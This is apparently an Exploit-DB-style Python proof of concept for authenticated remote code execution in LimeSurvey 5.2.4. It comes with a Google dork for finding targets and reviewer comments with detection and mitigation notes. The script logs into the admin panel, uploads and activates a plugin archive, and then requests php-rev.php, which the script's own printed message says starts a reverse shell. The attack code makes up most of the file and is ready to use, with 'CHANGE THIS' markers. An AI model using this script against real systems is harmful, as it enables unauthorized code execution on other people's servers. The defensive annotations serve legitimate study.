
# Exploit Title: LimeSurvey 5.2.4 - Remote Code Execution (RCE) (Authenticated)
# Google Dork: inurl:limesurvey/index.php/admin/authentication/sa/login
# Date: 05/12/2021
# Exploit Author: Y1LD1R1M
# Vendor Homepage: https://www.limesurvey.org/
# Software Link: https://download.limesurvey.org/latest-stable-release/limesurvey5.2.4+211129.zip
# Version: 5.2.x
# Tested on: Kali Linux 2021.3
# Reference: https://github.com/Y1LD1R1M-1337/Limesurvey-RCE


#!/usr/bin/python
# -*- coding: utf-8 -*-
"""Authenticated LimeSurvey plugin-upload proof of concept.

Reading guide (for reviewers / defenders): the script logs in to the
LimeSurvey admin UI with the supplied credentials, then drives the plugin
manager through its normal upload -> confirm -> install -> activate flow
with a local ZIP archive, and finally requests a PHP file expected to sit
inside the uploaded plugin's directory under /upload/plugins/. Every step
is an ordinary admin action; the underlying risk is that admin-level
plugin upload amounts to running arbitrary PHP on the web host.

Detection / mitigation notes:
- The whole sequence comes from one HTTP session and hits
  /index.php/admin/pluginmanager with sa=upload, sa=uploadConfirm,
  sa=installUploadedPlugin and sa=activate in quick succession, followed
  by a GET for a .php file beneath /upload/plugins/ -- a usable pattern
  for web-server log review or WAF rules.
- New directories or PHP files appearing under upload/plugins/ on the
  server are a strong on-host indicator.
- The precondition is a valid admin login, so strong admin credentials,
  MFA / network restriction of the admin UI, and disabling the
  plugin-upload feature in the application configuration (where that
  option is available) are the primary controls.
"""


import requests
import sys
import warnings
from bs4 import BeautifulSoup

# Silences bs4 UserWarning output on stdout; cosmetic only.
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
print("_______________LimeSurvey RCE_______________")
print("")
print("")
print("Usage: python exploit.py URL username password port")
print("Example: python exploit.py http://192.26.26.128 admin password 80")
print("")
print("")
print("== ██╗ ██╗ ██╗██╗ ██████╗ ██╗██████╗ ██╗███╗ ███╗ ==")
print("== ╚██╗ ██╔╝███║██║ ██╔══██╗███║██╔══██╗███║████╗ ████║ ==")
print("== ╚████╔╝ ╚██║██║ ██║ ██║╚██║██████╔╝╚██║██╔████╔██║ ==")
print("== ╚██╔╝ ██║██║ ██║ ██║ ██║██╔══██╗ ██║██║╚██╔╝██║ ==")
print("== ██║ ██║███████╗██████╔╝ ██║██║ ██║ ██║██║ ╚═╝ ██║ ==")
print("== ╚═╝ ╚═╝╚══════╝╚═════╝ ╚═╝╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ==")
print("")
print("")
# Positional arguments, no validation: a missing argument raises IndexError
# here. `port` is read but never used anywhere below -- the URL argument has
# to carry the port itself.
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
port = sys.argv[4]

# A single session so the login cookie is carried across the admin requests.
req = requests.session()
print("[+] Retrieving CSRF token...")
loginPage = req.get(url+"/index.php/admin/authentication/sa/login")
response = loginPage.text
s = BeautifulSoup(response, 'html.parser')
# Takes the value of the FIRST <input> on the page and treats it as the Yii
# CSRF token; this relies on the form's field order and is never checked.
# The same pattern is repeated for CSRF_token2/3/4 below.
CSRF_token = s.findAll('input')[0].get("value")
print(CSRF_token)
print("[+] Sending Login Request...")

# Fields mirror the admin login form; the hard-coded "width" value is
# presumably a leftover from a captured browser request.
login_creds = {
"user": username,
"password": password,
"authMethod": "Authdb",
"loginlang":"default",
"action":"login",
"width":"1581",
"login_submit": "login",
"YII_CSRF_TOKEN": CSRF_token
}
# Printed unconditionally: the login POST only happens further down (the
# `login = req.post(...)` line) and its response is never inspected.
print("[+]Login Successful")
print("")
print("[+] Upload Plugin Request...")
print("[+] Retrieving CSRF token...")
# Local plugin archive to upload; hard-coded path, opened in binary mode and
# never closed explicitly. This archive is what ends up under upload/plugins/.
filehandle = open("/root/limesurvey/plugin/Y1LD1R1M.zip",mode = "rb") # CHANGE THIS
login = req.post(url+"/index.php/admin/authentication/sa/login" ,data=login_creds)
UploadPage = req.get(url+"/index.php/admin/pluginmanager/sa/index")
response = UploadPage.text
s = BeautifulSoup(response, 'html.parser')
CSRF_token2 = s.findAll('input')[0].get("value")
print(CSRF_token2)
# "$lid" is sent as a literal string (Python does no interpolation here); it
# looks like a placeholder copied from a captured request -- whether the
# server ignores it cannot be told from this file.
Upload_creds = {
"YII_CSRF_TOKEN":CSRF_token2,
"lid":"$lid",
"action": "templateupload"
}
# Multipart upload of the ZIP to the plugin manager, then the confirm step;
# neither response is examined before the success message is printed.
file_upload= req.post(url+"/index.php/admin/pluginmanager?sa=upload",files = {'the_file':filehandle},data=Upload_creds)
UploadPage = req.get(url+"/index.php/admin/pluginmanager?sa=uploadConfirm")
response = UploadPage.text
print("[+] Plugin Uploaded Successfully")
print("")
print("[+] Install Plugin Request...")
print("[+] Retrieving CSRF token...")

InstallPage = req.get(url+"/index.php/admin/pluginmanager?sa=installUploadedPlugin")
response = InstallPage.text
s = BeautifulSoup(response, 'html.parser')
CSRF_token3 = s.findAll('input')[0].get("value")
print(CSRF_token3)
Install_creds = {
"YII_CSRF_TOKEN":CSRF_token3,
"isUpdate": "false"
}
file_install= req.post(url+"/index.php/admin/pluginmanager?sa=installUploadedPlugin",data=Install_creds)
print("[+] Plugin Installed Successfully")
print("")
print("[+] Activate Plugin Request...")
print("[+] Retrieving CSRF token...")
ActivatePage = req.get(url+"/index.php/admin/pluginmanager?sa=activate")
response = ActivatePage.text
s = BeautifulSoup(response, 'html.parser')
CSRF_token4 = s.findAll('input')[0].get("value")
print(CSRF_token4)
# pluginId is hard-coded to "1" rather than read back from the install
# response; presumably the plugin manager's id of the newly installed plugin
# (the "CHANGE THIS" marker suggests it varies per deployment).
Activate_creds = {
"YII_CSRF_TOKEN":CSRF_token4,
"pluginId": "1" # CHANGE THIS
}
file_activate= req.post(url+"/index.php/admin/pluginmanager?sa=activate",data=Activate_creds)
print("[+] Plugin Activated Successfully")
print("")
print("[+] Reverse Shell Starting, Check Your Connection :)")
# Final request fetches a PHP file from the uploaded plugin's directory
# (presumably shipped inside the ZIP above -- confirm against the archive).
# The response is discarded; nothing in this script listens for anything.
shell= req.get(url+"/upload/plugins/Y1LD1R1M/php-rev.php") # CHANGE THIS